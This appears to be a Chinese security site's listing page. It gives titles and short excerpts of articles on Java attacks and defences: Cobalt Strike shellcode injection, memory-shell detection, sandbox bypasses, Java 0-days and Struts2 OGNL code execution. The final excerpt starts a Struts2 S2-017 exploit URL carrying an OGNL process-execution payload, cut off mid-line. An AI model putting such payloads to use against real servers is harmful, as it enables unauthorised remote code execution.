在后渗透中常常需要cobaltstrike工具。而向已攻破的服务器注入一段cobaltStrike的shellcode是最便捷的上线方法。偏偏java这种语言屏蔽了很多操作系统的底层细节,注入shel...
安全文章
安全文章
安全文章
基于javaAgent内存马检测查杀指南
新版冰蝎的内存马使用基于javaagnet技术实现,在昨天的文章中,我只谈了怎么还原被修改的内存马。但是在检测这块,我并没有详细说明,其实这块我也不太清楚。不过经过我昨日连夜分析javaagent相关...
安全闲碎
基于虚拟机的类加载机制实现热修复
本文为看雪论坛优秀文章看雪论坛作者ID:镜中人24关于虚拟机1. 虚拟机是什么?众所周知Java程序是运行在虚拟机(JVM)上的,而安卓之前的官方语言正是Java,所以在安卓中也会存在虚拟机的概念。虚...
安全工具
DBeaver,杀出重围!
来自公众号:小姐姐味道作者简介:一个不允许程序员走弯路的公众号。聚焦基础架构和Linux。十年架构,日百亿流量,与你探讨高并发世界,给你不一样的味道。我最近装上了DBeaver,原因是很多人捧它。好家...
lcx
SAE云服务安全沙箱绕过
By kxlzx http://www.inbreak.net 微博:http://t.qq.com/javasecurity ps:此漏洞,新浪已修复。 摘要 新浪有云服务(SAE),提供PHP、J...
lcx
Let's start the week with a new Java 0-day in Metasploit
On late Sunday night, the Metasploit Exploit team was looking for kicks, and heard the word on the s...
![Java 0day,该漏洞影响浏览器的JRE[1.7.x]插件,可进行挂马攻击](http://cn-sec.com/wp-content/themes/begin-lts-1/img/random/3.jpg)
lcx
Java 0day,该漏洞影响浏览器的JRE[1.7.x]插件,可进行挂马攻击
捕获到最新的Java 0day漏洞。该漏洞影响浏览器的JRE插件,危害巨大;攻击者可利用该漏洞进行挂马攻击,进而控制网民用户的计算机。目前,该漏洞的利用代码已被公开,而官方尚未发布任何补丁;在补丁发布...
lcx
如果编程语言是一条船…
我是受最近的一个论坛帖子启发,他的想法至今仍让我感到奇特。 Turing(图灵) Turing绝对是一个双人皮划艇(感谢评论里的提醒)。它很小。人力的。它通常被当作初学者的”船“。而且它非常的加拿大。...
lcx
Struts2漏洞浅析之Ongl代码执行分析
唐门三少 发表于 2012-12-9 13:38 0x01 简述 2010年7月exploitdb爆出的《Struts2/XWork 0x02 Ognl表达式实现代码执行 Ognl表达式是一种基于Ja...
lcx
memcached可能存在篡改对象导致的注入代码执行漏洞
memcached存储java对象时,可能存在篡改对象导致的注入代码执行漏洞。 memcached介绍:http://baike.baidu.com/view/794242.htm 大家经常会发现,大...
lcx
Oracle Java Runtime Environment 远程代码执行漏洞(CVE-2013-1493)
YAJ0: Yet Another Java Zero-Day 最近大半年jre被搞得很惨,利用jre漏洞绕过安全sandbox环境Applet挂马是挂疯了!之前相关一批绕过沙盒是利用java反射机制...
lcx
Struts2 s-017 Working EXP
http://www.example.com/struts2-showcase/employee/save.action?redirect:${%23a%3d(new java.lang.Proces...
